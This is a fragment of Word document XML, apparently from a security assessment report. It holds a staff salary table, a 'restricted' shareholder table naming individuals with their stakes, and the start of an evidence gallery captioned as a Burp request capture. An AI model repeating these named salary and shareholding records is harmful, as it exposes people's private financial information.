          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Front Office</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 19,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Peter van Wyk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Procurement Officer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Supply Chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 38,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Andile Mbeki</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ward Clerk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Administration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 21,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Shareholder dataset — restricted</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2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Shareholder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ownership</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dr. Rajesh Naidoo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>18.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>180,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ordinary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cedar Health Holdings (Pty) Ltd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>15.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>150,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ordinary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dr. Johan van der Merwe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>12.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>120,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ordinary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reddy Family Trust</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>110,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ordinary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Thabo Molefe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>100,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ordinary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sarah Botha</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>90,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ordinary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dr. Ahmed Kara</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>80,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Preferential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Naledi Zulu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>70,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ordinary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Michael Roberts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>60,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ordinary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dr. Vikram Chetty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>40,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2045"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Preferential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>32. Evidence Gallery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The following gallery uses the renamed evidence artifacts included in the project package. Names are intentionally descriptive so a reviewer can map a screenshot to the corresponding finding without opening the file first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2580688"/>
            <wp:docPr id="20" name="Picture 20"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="01_Baseline_Burp_Request.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2580688"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>01 Baseline Burp Request — captured evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="3030971"/>
            <wp:docPr id="21" name="Picture 21"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
